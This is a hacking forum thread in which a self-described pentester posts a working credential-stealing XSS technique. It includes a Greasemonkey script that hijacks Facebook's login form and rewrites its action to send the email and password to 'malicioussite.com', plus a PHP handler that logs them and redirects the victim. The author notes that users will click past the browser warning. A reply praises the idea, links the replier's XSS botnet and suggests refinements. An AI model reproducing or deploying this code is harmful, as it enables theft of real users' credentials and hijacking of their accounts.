Frame Busting & SOP XSS


Post by x509 on Mon Aug 17, 2015 7:47 pm

In a recent pentest, I found a way to gain persistent XSS on the website login page. I found the client was using Frame Busting disallowing the use of iFrames. Typically in a scenario similar to this, one might simply create some JavaScript payload to snag the cookie data and send it off to be analyzed and used to duplicate the user's session in what is typically referred to as a cookie hijacking attack. In most cases, the payload consists of grabbing the cookies and then loading an invisible iFrame in that page that points to some server which will handle the cookies. However, in this specific case, the iFrame could not be loaded on the page, and, hell, I didn't just want a session, I wanted legitimate credentials! The other big issue was Same Origin Policy, which mitigated a lot of my other attempts. So, I decided I would sit down and analyze what I wanted to do... I came to the conclusion that I could use Ajax to send requests to my server to handle the data. However, SOP got in my way, or maybe I just had it set up wrong... So, I thought a bit more, and came up with a working solution. I would monitor for a login submission and then use Ajax to send the request to the actual server it belongs to so that I don't have to fight with Same Origin Policy rules. The next thing I would do is modify the action of the form before it gets submitted and point that to my server instead, where my server logs the data and then redirects them back to Facebook (logged in). This will completely avoid Same Origin Policy and give me the desired results. The one downfall to this approach is that browsers may notify the user that the data is being sent through an insecure connection and could be sniffed in the event that your server is not SSL verified.

Anyway, time to get dirty and post some proof of concept. I redesigned this in conjunction with greasemonkey and Facebook as a proof of concept.
Greasemonkey Script: GIST LINK
// ==UserScript==
// @name        Test
// @namespace   *
// @description Test
// @version     1
// @grant       none
// @include     http://*
// @include     https://*
// @require     http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.js
// ==/UserScript==

var handler = "malicioussite.com/handler.php?data="; // Our server to handle the data passed as $_GET
var xform   = document.forms[0];                     // Just grab the first form (it's the login form in this case)
var action  = "/login.php?login_attempt=1";          // Where the actual action of the form should point
var a_type  = "POST";                                // The method of the form

// monitor for an onsubmit action of the login form
xform.onsubmit = function () {
  // Grab needed values (lsd is important here, as it's an XSRF token)
  var email = xform.email.value;
  var pass  = xform.pass.value;
  var token = xform.lsd.value;
  var perst = xform.default_persistent.value;

  // Prepare our object for the Ajax request
  var formData = {
    email: email,
    pass: pass,
    lsd: token,
    default_persistent: perst
  };

  var data = email + ':' + pass; // What we want to pass to our server
  // Change the action to our server and make sure to encode the data
  // The server should decode this then use it, otherwise an ampersand splits our data
  // and we will not be able to view all of the data (i.e. with a password of "lol&kek123" the server would only get "lol")
  xform.action = handler + encodeURIComponent(data);
  // Perform the Ajax call using jQuery (Don't judge me)
  $.ajax({
    url: action,
    type: a_type,
    data: formData
  });
};


Server Handling Data: GIST LINK
<?php
  $data = urldecode($_GET['data']);
  /***
    Do something with data here (log it somehow)
  ***/
  // Make sure you redirect them
  header('Location: https://www.facebook.com/');
?>


The warning (this will appear if you do not have SSL enabled): [image of the browser's insecure-submission warning]

Anyway, many people will click continue and go about their way ;)
Does anyone know of any other great alternatives, assuming you are in the same situation?

I have verified that the error message does not appear when sending it over an SSL enabled site.
x509
New User
Posts: 16
Joined: Sun Aug 09, 2015 1:47 am


Re: Frame Busting & SOP XSS

Post by tgoe on Tue Aug 18, 2015 8:35 pm

I really like the idea of a web app built upon the collective power of everyone with a tab open.

I thought Ravan was cool when it launched :)

A long time ago I wrote an xss botnet, the beginnings of which are here:
https://www.hackthissite.org/forums/viewtopic.php?f=24&t=4144&start=10#p29869
https://www.hackthissite.org/forums/viewtopic.php?f=104&t=4212&p=30219

Anyway, I don't like your poc. You need to factor out greasemonkey, facebook and jquery. Maybe WebRTC will save us all.
tgoe
Contributor
Posts: 718
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7


